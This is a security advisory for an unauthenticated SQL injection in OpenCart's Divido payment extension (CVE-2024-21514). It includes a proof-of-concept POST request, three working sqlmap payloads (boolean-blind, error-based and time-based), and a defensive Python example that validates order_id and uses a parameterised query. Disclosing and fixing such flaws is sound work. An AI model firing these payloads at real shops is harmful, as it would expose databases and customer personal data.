SQL Injection Affecting opencart/opencart package, versions <3.0.4.0
Snyk ID SNYK-PHP-OPENCARTOPENCART-7266565
- published 21 Jun 2024
- disclosed 21 Jun 2024
- credit Calum Hutton
Introduced: 21 Jun 2024
CVE-2024-21514
How to fix?
Upgrade opencart/opencart to version 3.0.4.0 or higher.
Overview
opencart/opencart is a shopping cart system.
Affected versions of this package are vulnerable to SQL Injection. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
PoC
This can be exploited with a POST request to /index.php?route=extension/payment/divido/update, which will delay the response for 5 seconds.
POST http://localhost/index.php?route=extension/payment/divido/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
content-length: 44
{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Feeding this request to sqlmap identified three different payload types:
python3 sqlmap.py -vv -r /tmp/oc2.raw --level 3 --risk 2
...
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: {"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
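The root cause described above is an order_id taken from the JSON body and used in a query without validation. The following Python is an added example written for this advisory, not code from OpenCart, Divido or Snyk: it shows the input check a handler (or a body-inspecting reverse proxy) would apply to metadata.order_id, runs it over the three sqlmap payloads quoted on this page plus one benign body, and pairs the check with a parameterised lookup. The in-memory SQLite database, the orders table and the function names are assumptions made for the example; OpenCart itself runs on MySQL and its real schema is not reproduced here.

```python
import json
import re
import sqlite3
from typing import List, Optional

# Constructed sample request bodies: the first is benign, the other three
# are the payload strings from the advisory's sqlmap output (quoted as-is).
SAMPLE_BODIES = [
    '{"status":true,"metadata":{"order_id":"42"}}',
    '{"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}',
    '{"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}',
    '{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}',
]

# OpenCart order ids are integer primary keys, so digits only (bounded length
# stops absurdly long values before they reach the database).
ORDER_ID_RE = re.compile(r"^[0-9]{1,10}$")


def extract_order_id(body: str):
    """Return metadata.order_id from a JSON body, or None if absent or malformed."""
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    meta = doc.get("metadata") if isinstance(doc, dict) else None
    if not isinstance(meta, dict):
        return None
    return meta.get("order_id")


def is_valid_order_id(value) -> bool:
    """Allow-list check: the value must be a string or int made only of digits."""
    return isinstance(value, (str, int)) and ORDER_ID_RE.match(str(value)) is not None


def classify_body(body: str) -> str:
    """'ok' for a purely numeric order_id, 'reject' for anything else.
    Every sqlmap payload on this page fails because it contains spaces,
    parentheses or letters, none of which an order id can carry."""
    return "ok" if is_valid_order_id(extract_order_id(body)) else "reject"


def run_samples() -> List[str]:
    """Classify each constructed sample body."""
    return [classify_body(b) for b in SAMPLE_BODIES]


def build_demo_db() -> sqlite3.Connection:
    """Hypothetical stand-in for the shop database (assumption: SQLite, two rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_id INTEGER PRIMARY KEY, status TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)", [(42, "paid"), (43, "pending")])
    return conn


def lookup_order_status(conn: sqlite3.Connection, order_id) -> Optional[str]:
    """Hardened lookup: validate first, then bind the value as a parameter so the
    driver never splices it into the SQL text. Rejected input raises instead of
    reaching the query at all."""
    if not is_valid_order_id(order_id):
        raise ValueError("order_id must be a positive integer")
    row = conn.execute(
        "SELECT status FROM orders WHERE order_id = ?", (int(order_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = build_demo_db()
    for body, verdict in zip(SAMPLE_BODIES, run_samples()):
        print(f"{verdict:6} {body[:70]}")
    print("status of order 42:", lookup_order_status(conn, "42"))
```

The allow-list is deliberately stricter than "escape the quotes": the time-based and error-based payloads above contain no quote characters at all, so escaping alone would not have stopped them, whereas a digits-only check plus a bound parameter closes every variant sqlmap listed.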